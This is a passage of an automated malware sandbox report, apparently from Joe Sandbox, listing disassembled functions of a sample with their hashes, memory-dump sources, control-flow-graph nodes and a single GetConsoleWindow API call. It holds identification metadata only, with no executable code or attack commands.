                      • Opcode Fuzzy Hash: 302c469aba3d4f7ec971e0af86a4283708a847a9370295892c2f5367c8ba9563
                      • Instruction Fuzzy Hash: A05129B4E002598FDB18CFA9C5805AEFBF2FF89304F248169D418A7256D7359A41CFA1
                      Function 07C34E20 Relevance: .1, Instructions: 130COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746245815.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7c30000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 579ed15a7d009038fb9a0af002a2cc5b6d6b382a3d7d697c7c388ed0cfd17e74
                      • Instruction ID: 6ed8db2ce8378eb28de42e6cb3c2b3c0ed25d5139de53145bd841822be9a9bcd
                      • Opcode Fuzzy Hash: 579ed15a7d009038fb9a0af002a2cc5b6d6b382a3d7d697c7c388ed0cfd17e74
                      • Instruction Fuzzy Hash: D6511AB0E002198FDB18CFA9C5805AEFBF2FF89304F248169D419A7356D734AA41CFA1
                      Function 07C3A858 Relevance: .1, Instructions: 92COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746245815.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7c30000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 00c7cfbb2552ceef87bfc153d796ad6ca0abe9130cef4a1ff826cfbde21d9289
                      • Instruction ID: 0d2753a152e4bfdbab345049b97152ea67f5e759e7728b4f6d9ee4e4850cdfb6
                      • Opcode Fuzzy Hash: 00c7cfbb2552ceef87bfc153d796ad6ca0abe9130cef4a1ff826cfbde21d9289
                      • Instruction Fuzzy Hash: C431C7B1D057288BEB28CF6B8D043DDF7F6AFC9300F04C1AA944CA6254DB340A958F01

                      Execution Graph

                      Execution Coverage:12.4%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:0%
                      Total number of Nodes:21
                      Total number of Limit Nodes:0
                      execution_graph 15704 27d0871 15705 27d087c 15704->15705 15706 27d0880 15705->15706 15707 27d0882 15705->15707 15713 27d08c8 15706->15713 15718 27d08d8 15706->15718 15708 27d0889 15707->15708 15709 27d08d8 2 API calls 15707->15709 15710 27d08c8 2 API calls 15707->15710 15709->15708 15710->15708 15714 27d08d0 15713->15714 15723 27d0ce8 15714->15723 15727 27d0ce0 15714->15727 15715 27d093e 15715->15708 15719 27d08fa 15718->15719 15721 27d0ce8 GetConsoleWindow 15719->15721 15722 27d0ce0 GetConsoleWindow 15719->15722 15720 27d093e 15720->15708 15721->15720 15722->15720 15724 27d0d26 GetConsoleWindow 15723->15724 15726 27d0d56 15724->15726 15726->15715 15728 27d0ce4 GetConsoleWindow 15727->15728 15730 27d0d56 15728->15730 15730->15715

                      Executed Functions

                      Function 027D0CE0 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 861 27d0ce0-27d0ce2 862 27d0ce4 861->862 863 27d0ce6-27d0d54 GetConsoleWindow 861->863 862->863 868 27d0d5d-27d0d82 863->868 869 27d0d56-27d0d5c 863->869 869->868
                      APIs
                      • GetConsoleWindow.KERNELBASE ref: 027D0D47
                      Memory Dump Source
                      • Source File: 00000008.00000002.1857069671.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_27d0000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID: ConsoleWindow
                      • String ID:
                      • API String ID: 2863861424-0
                      • Opcode ID: 40e79faa2b1ad4935aa694bd16442ec5b566efcbb4c573588a440d3aeba16643
                      • Instruction ID: b9ed9f9518b93edb3c87cb55d8a192da713d46380ae60324e38f30a8dea2ec0d
                      • Opcode Fuzzy Hash: 40e79faa2b1ad4935aa694bd16442ec5b566efcbb4c573588a440d3aeba16643
                      • Instruction Fuzzy Hash: 3D118BB1D003488FCB20DFAAC4447EEFFF4AB49314F24845AC059A7210C775A545CF94
                      Function 027D0CE8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 873 27d0ce8-27d0d54 GetConsoleWindow 876 27d0d5d-27d0d82 873->876 877 27d0d56-27d0d5c 873->877 877->876
                      APIs
                      • GetConsoleWindow.KERNELBASE ref: 027D0D47
                      Memory Dump Source
                      • Source File: 00000008.00000002.1857069671.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_27d0000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID: ConsoleWindow
                      • String ID:
                      • API String ID: 2863861424-0
                      • Opcode ID: 393c143ba6514185768c04816a3d8fa0413f84eb39db733db26fa673c09233f4
                      • Instruction ID: 6b044120b9b1244919b64f7bd4cd0ee657cd96d4ae3461a010f3867a47fb76e0
                      • Opcode Fuzzy Hash: 393c143ba6514185768c04816a3d8fa0413f84eb39db733db26fa673c09233f4
                      • Instruction Fuzzy Hash: FC1106B1D003498FCB20DFAAC4457DEFBF4AB48324F20846AC459A7250C775A544CFA5
                      Function 062C1550 Relevance: 1.4, Instructions: 1412COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 927 62c1550-62c1573 928 62c1575-62c1577 927->928 929 62c1581-62c15d7 927->929 928->929 933 62c15dd-62c160d 929->933 934 62c19a7-62c19f9 929->934 933->934 943 62c1613-62c1643 933->943 937 62c19fb-62c1a01 934->937 938 62c1a11-62c1a6c 934->938 940 62c1a05-62c1a0f 937->940 941 62c1a03 937->941 956 62c27b2-62c27f8 938->956 957 62c1a72-62c1a87 938->957 940->938 941->938 943->934 949 62c1649-62c1679 943->949 949->934 954 62c167f-62c16af 949->954 954->934 965 62c16b5-62c16e5 954->965 963 62c27fa-62c2800 956->963 964 62c2810-62c2888 956->964 957->956 961 62c1a8d-62c1abe 957->961 974 62c1ad8-62c1b24 961->974 975 62c1ac0-62c1ad6 961->975 966 62c2804-62c280e 963->966 967 62c2802 963->967 990 62c288a-62c28b0 964->990 991 62c28b2-62c28b9 964->991 965->934 978 62c16eb-62c171b 965->978 966->964 967->964 986 62c1b2b-62c1b48 974->986 975->986 978->934 988 62c1721-62c1751 978->988 986->956 996 62c1b4e-62c1b80 986->996 988->934 1000 62c1757-62c1787 988->1000 990->991 1003 62c1b9a-62c1be6 996->1003 1004 62c1b82-62c1b98 996->1004 1000->934 1008 62c178d-62c17bd 1000->1008 1011 62c1bed-62c1c0a 1003->1011 1004->1011 1008->934 1017 62c17c3-62c17da 1008->1017 1011->956 1016 62c1c10-62c1c42 1011->1016 1023 62c1c5c-62c1ca8 1016->1023 1024 62c1c44-62c1c5a 1016->1024 1017->934 1021 62c17e0-62c180c 1017->1021 1029 62c180e-62c1834 1021->1029 1030 62c1836-62c1878 1021->1030 1034 62c1caf-62c1ccc 1023->1034 1024->1034 1045 62c18a8-62c18d5 1029->1045 1048 62c187a-62c1890 1030->1048 1049 62c1896-62c18a2 1030->1049 1034->956 1041 62c1cd2-62c1d04 1034->1041 1051 62c1d1e-62c1d6a 1041->1051 1052 62c1d06-62c1d1c 1041->1052 1045->934 1055 62c18db-62c190f 1045->1055 1048->1049 1049->1045 1060 62c1d71-62c1d8e 1051->1060 1052->1060 1055->934 1063 62c1915-62c1958 1055->1063 1060->956 1066 62c1d94-62c1dc6 1060->1066 1063->934 1077 62c195a-62c198a 1063->1077 1071 62c1dc8-62c1dde 1066->1071 1072 62c1de0-62c1e38 1066->1072 1081 62c1e3f-62c1e5c 1071->1081 1072->1081 1077->934 1087 62c198c-62c19a4 1077->1087 1081->956 1086 62c1e62-62c1e94 1081->1086 1091 62c1eae-62c1f0c 1086->1091 1092 62c1e96-62c1eac 1086->1092 1097 62c1f13-62c1f30 1091->1097 1092->1097 1097->956 1101 62c1f36-62c1f68 1097->1101 1104 62c1f6a-62c1f80 1101->1104 1105 62c1f82-62c1fe0 1101->1105 1110 62c1fe7-62c2004 1104->1110 1105->1110 1110->956 1113 62c200a-62c203c 1110->1113 1117 62c203e-62c2054 1113->1117 1118 62c2056-62c20b4 1113->1118 1123 62c20bb-62c20d8 1117->1123 1118->1123 1123->956 1127 62c20de-62c2110 1123->1127 1130 62c212a-62c2188 1127->1130 1131 62c2112-62c2128 1127->1131 1136 62c218f-62c21ac 1130->1136 1131->1136 1136->956 1139 62c21b2-62c21c7 1136->1139 1139->956 1142 62c21cd-62c21fe 1139->1142 1145 62c2218-62c2276 1142->1145 1146 62c2200-62c2216 1142->1146 1151 62c227d-62c229a 1145->1151 1146->1151 1151->956 1155 62c22a0-62c22d2 1151->1155 1158 62c22ec-62c234a 1155->1158 1159 62c22d4-62c22ea 1155->1159 1164 62c2351-62c236e 1158->1164 1159->1164 1164->956 1167 62c2374-62c23a6 1164->1167 1171 62c23a8-62c23be 1167->1171 1172 62c23c0-62c241e 1167->1172 1177 62c2425-62c2442 1171->1177 1172->1177 1177->956 1181 62c2448-62c247a 1177->1181 1184 62c247c-62c2492 1181->1184 1185 62c2494-62c24f2 1181->1185 1190 62c24f9-62c2516 1184->1190 1185->1190 1190->956 1193 62c251c-62c2531 1190->1193 1193->956 1196 62c2537-62c2568 1193->1196 1199 62c256a-62c2580 1196->1199 1200 62c2582-62c25e0 1196->1200 1205 62c25e7-62c2604 1199->1205 1200->1205 1205->956 1209 62c260a-62c261f 1205->1209 1209->956 1211 62c2625-62c2656 1209->1211 1214 62c2658-62c266e 1211->1214 1215 62c2670-62c26ce 1211->1215 1220 62c26d5-62c26f2 1214->1220 1215->1220 1220->956 1223 62c26f8-62c2724 1220->1223 1227 62c273e-62c2793 1223->1227 1228 62c2726-62c273c 1223->1228 1233 62c279a-62c27af 1227->1233 1228->1233
                      Memory Dump Source
                      • Source File: 00000008.00000002.1867482898.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_62c0000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1aa7777fafc0fc638b6ffece34991be59fb57d50be86d377ae2bdf63260c663e
                      • Instruction ID: d2d88bda25a68109922ad6d62d8f1d154cf6a610dc5c96ffaa2b1b2513a25384
                      • Opcode Fuzzy Hash: 1aa7777fafc0fc638b6ffece34991be59fb57d50be86d377ae2bdf63260c663e
                      • Instruction Fuzzy Hash: 13C25E34B501189FCB14CB54CD95E9EBBB2FF88700F508099EA05AB3A1DB71AD85CF51
                      Function 062C349D Relevance: 1.3, Instructions: 1277COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1343 62c349d-62c3526 1351 62c352c-62c355d 1343->1351 1354 62c355f-62c3578 1351->1354 1355 62c357b-62c35c7 1351->1355 1359 62c35cd-62c35df 1355->1359 1360 62c36d6-62c3706 1355->1360 1363 62c35e1-62c35f0 1359->1363 1369 62c370c-62c371b 1360->1369 1370 62c3798-62c37a3 1360->1370 1367 62c35f2-62c3627 1363->1367 1368 62c3663-62c3667 1363->1368 1396 62c363f-62c3661 1367->1396 1397 62c3629-62c362f 1367->1397 1371 62c3669-62c3674 1368->1371 1372 62c3676 1368->1372 1383 62c371d-62c3746 1369->1383 1384 62c376b-62c376f 1369->1384 1378 62c37ab-62c37b5 1370->1378 1373 62c367b-62c367e 1371->1373 1372->1373 1376 62c36b4-62c36d1 1373->1376 1377 62c3680-62c3684 1373->1377 1376->1378 1381 62c3686-62c3691 1377->1381 1382 62c3693 1377->1382 1385 62c3695-62c3697 1381->1385 1382->1385 1407 62c375e-62c3769 1383->1407 1408 62c3748-62c374e 1383->1408 1386 62c377e 1384->1386 1387 62c3771-62c377c 1384->1387 1391 62c369d-62c36a6 1385->1391 1392 62c37b8-62c37c5 1385->1392 1393 62c3780-62c3782 1386->1393 1387->1393 1411 62c36a7-62c36ae 1391->1411 1399 62c37cc-62c37ea 1392->1399 1393->1399 1400 62c3784-62c378d 1393->1400 1396->1411 1402 62c3631 1397->1402 1403 62c3633-62c3635 1397->1403 1412 62c378e-62c3792 1400->1412 1402->1396 1403->1396 1407->1412 1413 62c3750 1408->1413 1414 62c3752-62c3754 1408->1414 1411->1363 1411->1376 1412->1369 1412->1370 1413->1407 1414->1407
                      Memory Dump Source
                      • Source File: 00000008.00000002.1867482898.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_62c0000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8b4b898ee8aba2bd4765300d5f80d151bdcf5a3c901ac847b681ba21b45abf9f
                      • Instruction ID: 60f16ed89cf69ff265708b0d041e22535b7b9fce53e6a3f59115d39f89d4e0ce
                      • Opcode Fuzzy Hash: 8b4b898ee8aba2bd4765300d5f80d151bdcf5a3c901ac847b681ba21b45abf9f
                      • Instruction Fuzzy Hash: FCA19F74B102559FCB44DB68C894A6EBBF2EF89310B1089AEE916DB3A1CB74DC05CB51
                      Function 062C0048 Relevance: .7, Instructions: 664COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.1867482898.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_62c0000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: caa4869b1d0ceb209318fb4b212722d2cbae401fa5d0eca683e85df96843fa7d
                      • Instruction ID: f3d9de34e1c2e2db2a70853b73b73a506a9ea1b268b8550b47a0536635f4f916
                      • Opcode Fuzzy Hash: caa4869b1d0ceb209318fb4b212722d2cbae401fa5d0eca683e85df96843fa7d
                      • Instruction Fuzzy Hash: D5427930B50624CFCB64AF68D45096FBBF6FBC5311B104A5CD5029B3A4CB76E90A8BC6
                      Function 062C04F4 Relevance: .5, Instructions: 498COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.1867482898.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_62c0000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ed03de60210e397e9edf8c7ac5ddfe765a0c6ed90e78e1b0425c3a297dcbf404
                      • Instruction ID: 1e7b9b03f5d47778c1e49c695477749ded14e2d0458e9b036231f632d01f728c
                      • Opcode Fuzzy Hash: ed03de60210e397e9edf8c7ac5ddfe765a0c6ed90e78e1b0425c3a297dcbf404
                      • Instruction Fuzzy Hash: C1127C30B50614CFDB50DF68C450A6EBBF6FF85710F108A5DD9029B3A5CB76E90A8B86
                      Function 062C056A Relevance: .5, Instructions: 463COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.1867482898.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_62c0000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 25750f80c019d54c89c54f48419f3c0f1fb949633d75a8befafd58b8622d4ba0
                      • Instruction ID: 023745597a36cb4a802dda7fd3be1fc998e45185e8fc8ae08bd678410522d597
                      • Opcode Fuzzy Hash: 25750f80c019d54c89c54f48419f3c0f1fb949633d75a8befafd58b8622d4ba0
                      • Instruction Fuzzy Hash: 07028E30B50614CFDB50DF64C450A6EBBF6FF85710F008A5DD9029B3A5CB76E94A8B86
                      Function 062C05E0 Relevance: .4, Instructions: 427COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.1867482898.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_62c0000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f9d757ad42228d6f713c148153d833bae2f38fa33c3041add63c91ab4d9cf389
                      • Instruction ID: a226395c180295dd8312e37cf980c64e2060bf4ba9665b96a624c3797bce3392
                      • Opcode Fuzzy Hash: f9d757ad42228d6f713c148153d833bae2f38fa33c3041add63c91ab4d9cf389
                      • Instruction Fuzzy Hash: B4027D30B50214CFDB50DF64C850A6EBBF6FF85714F10865DD9029B3A5CBB2E94A8B91
                      Function 062C0656 Relevance: .4, Instructions: 389COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.1867482898.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_62c0000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 001d82b12889b5c32f67a56532c20f7a2025b51e784ab49d8318f9e6609ec0b5
                      • Instruction ID: cc4de871072593d2caaa0278e89270d7183eb0a08566627393e2e79309ebb650
                      • Opcode Fuzzy Hash: 001d82b12889b5c32f67a56532c20f7a2025b51e784ab49d8318f9e6609ec0b5
                      • Instruction Fuzzy Hash: E0F16B30B50214CFDB50DF64C854A6EBBF6FF85710F108659E9029B3A5CBB2E94ACB91
                      Function 062C06CC Relevance: .4, Instructions: 355COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.1867482898.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_62c0000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 29daf491b9959e2811042afb36ad0edc6565a31ba4f0974468cb7a341c6b5da5
                      • Instruction ID: 632b171abf0fe1801024c4918bd7d5d63d85a999ed18229add05dd3faf57b5e5
                      • Opcode Fuzzy Hash: 29daf491b9959e2811042afb36ad0edc6565a31ba4f0974468cb7a341c6b5da5
                      • Instruction Fuzzy Hash: D9E16930B50214DFEB40DF64C855A6E7BF6FF85710F108659EA028B3A5CBB2D94ACB91
                      Function 062C0001 Relevance: .3, Instructions: 340COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.1867482898.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_62c0000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6f390d358d44875846542bc676e68892a307269721ab4adc934c134cf82be144
                      • Instruction ID: 8ac9af2972687402804976e4b8c9e7690c067835508e66c24cad8a4004978d36
                      • Opcode Fuzzy Hash: 6f390d358d44875846542bc676e68892a307269721ab4adc934c134cf82be144
                      • Instruction Fuzzy Hash: 02D18F30A50244CFEB45DF64C855A6A7BF6FF89710F01815AE901CB3A6CBB2DD4ACB91
                      Function 062C1535 Relevance: .3, Instructions: 330COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.1867482898.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_62c0000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c1c1933f0cea6c1bb0913e6e06001694edbd67907f9f5ef198ef72a256d600d7
                      • Instruction ID: 8a6fb3eee75b41d79698a953e875a87efaeae412cf50e3d2a7fb32e50a274f03
                      • Opcode Fuzzy Hash: c1c1933f0cea6c1bb0913e6e06001694edbd67907f9f5ef198ef72a256d600d7
                      • Instruction Fuzzy Hash: 41C13A34B50105EFDB04CF58C9C9E5EBBB2FF89700BA18099EA059B7A1C672EC58CB51
                      Function 062C1308 Relevance: .2, Instructions: 202COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.1867482898.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_62c0000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d864b49f7fb6e6a59d072ba0bc9af1c8acce7ba12345b1f4a980e3f1a9cc7bd3
                      • Instruction ID: 3960135eea31a5e532d75c1ea6d187eafbeb3dcbc63e39a5fec5db3c01135c33
                      • Opcode Fuzzy Hash: d864b49f7fb6e6a59d072ba0bc9af1c8acce7ba12345b1f4a980e3f1a9cc7bd3
                      • Instruction Fuzzy Hash: 48514C31B207068FC754AF7ED44946ABBE5EFC1225B14867EDC05CB212EB31C855C7A1
                      Function 062C338B Relevance: .1, Instructions: 78COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.1867482898.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_62c0000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 781166ac57bb63da658db660700affad7c38b7df274ad738586bc57a9dcf1a57
                      • Instruction ID: 889ab73db852ce15d346e19b3d31aa9fc2325c06ab76b99253f0601b7524cca4
                      • Opcode Fuzzy Hash: 781166ac57bb63da658db660700affad7c38b7df274ad738586bc57a9dcf1a57
                      • Instruction Fuzzy Hash: 65216B35B500049FCB14CF68C994EA9BBB2EF88724F1184A9EE098F3A1DA31EC05CB50
                      Function 026FD054 Relevance: .1, Instructions: 77COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.1856627799.00000000026FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 026FD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_26fd000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 899cc2228ad14179bf8c5b0a9d91003e799da13510ab3affe2aca24a8f3bc430
                      • Instruction ID: 9056d775f57adbddcd46d5cac5568912ea6abba78b52b825b6d5ed41dc14a6bf
                      • Opcode Fuzzy Hash: 899cc2228ad14179bf8c5b0a9d91003e799da13510ab3affe2aca24a8f3bc430
                      • Instruction Fuzzy Hash: 3C210372504240EFDF55DF14D9C4B2ABFA5FB88314F24C269EA090B256C33AE456CBA1
                      Function 0270D2F4 Relevance: .1, Instructions: 72COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.1856718978.000000000270D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0270D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_270d000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3bfe62a9cd5c5ce370185e5ceaddc5ff14c62d6cbb2d8f2123302073c3d97c65
                      • Instruction ID: 19c3deeaa6e63f16e7ed5cf29b256c65e901c9a6175af9407dd160cfe6bcce63
                      • Opcode Fuzzy Hash: 3bfe62a9cd5c5ce370185e5ceaddc5ff14c62d6cbb2d8f2123302073c3d97c65
                      • Instruction Fuzzy Hash: 8C2126B1604300DFDB20DF54D9C4B2AFFA5FB84324F20C569D8095B286C37AD44ACAA1
                      Function 0270D4A4 Relevance: .1, Instructions: 72COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.1856718978.000000000270D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0270D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_270d000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5a1239e9ada381f2afe56042eaed0c3cf28cf95b80da178526546e634972b520
                      • Instruction ID: 7cd5e0fd3379d7a44157996243ef737ef9cad2fafd3633b0eb955c6e15ed8a62
                      • Opcode Fuzzy Hash: 5a1239e9ada381f2afe56042eaed0c3cf28cf95b80da178526546e634972b520
                      • Instruction Fuzzy Hash: AB2134B1500300DFDB14DF54D5C4B2ABBE5FB88318F20C56DEC0A4B296C33AD44ACA61
                      Function 026FD04F Relevance: .1, Instructions: 58COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.1856627799.00000000026FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 026FD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_26fd000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                      • Instruction ID: 4b624bb1e6e26a9febf3c028904f4a9fcafca2cc9f83a16f3ed1bf7639bf4d7a
                      • Opcode Fuzzy Hash: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                      • Instruction Fuzzy Hash: 48219D76504280DFCF16CF10D9C4B16BF72FB88314F24C6A9DA490B256C33AE426CBA1
                      Function 0270D2EF Relevance: .1, Instructions: 53COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.1856718978.000000000270D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0270D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_270d000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                      • Instruction ID: 7ffe6e97e6f35a2c5e36ef93180a4717d7eba5b9314175a97e91a2a489f310e5
                      • Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                      • Instruction Fuzzy Hash: 38118275504384DFDB11CF54D5C4B19FFA1FB84324F24C6AAD8494B696C33AD44ACBA1
                      Function 0270D49F Relevance: .1, Instructions: 53COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.1856718978.000000000270D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0270D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_270d000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                      • Instruction ID: 461755a05c9051c17a356c41c5d3993d60696f258c9f1f8ab7cb8b538f735f4d
                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                      • Instruction Fuzzy Hash: BF11BB75504380CFCB12CF54D5C4B19BFA1FB84218F24C6AADC494B2A6C33AD50ACB62
                      Function 026FDAF9 Relevance: .0, Instructions: 45COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.1856627799.00000000026FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 026FD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_26fd000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a43e521cb6552c13ea8a226bcda1b16576e1e20ec315e5dba7be04f24f63c7c4
                      • Instruction ID: 00fdb60231ee681264af6e8f582cbe51c04c0c0a3664bc021fb7ffbbedc019ac
                      • Opcode Fuzzy Hash: a43e521cb6552c13ea8a226bcda1b16576e1e20ec315e5dba7be04f24f63c7c4
                      • Instruction Fuzzy Hash: 2901DBB11093409AEF548F1ADD84767FFD8EF45325F18C56AEE094B286C379E840C6B1
                      Function 026FDAF8 Relevance: .0, Instructions: 36COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.1856627799.00000000026FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 026FD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_26fd000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fb6a00ec5cae7cde1253cd9cba7bedf46c835cb10d9fc38495703b10d220a46a
                      • Instruction ID: b6d96e4e3f19075d9858ea2d234413bdccf7ec2018ec7afb7d0216b26a350e5d
                      • Opcode Fuzzy Hash: fb6a00ec5cae7cde1253cd9cba7bedf46c835cb10d9fc38495703b10d220a46a
                      • Instruction Fuzzy Hash: 93F096715093449EEB108F1ADDC4B66FFA8EF41734F18C55AED084F286C379A844CAB1

                      Non-executed Functions

                      Function 062C0D50 Relevance: 10.3, Strings: 8, Instructions: 297COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
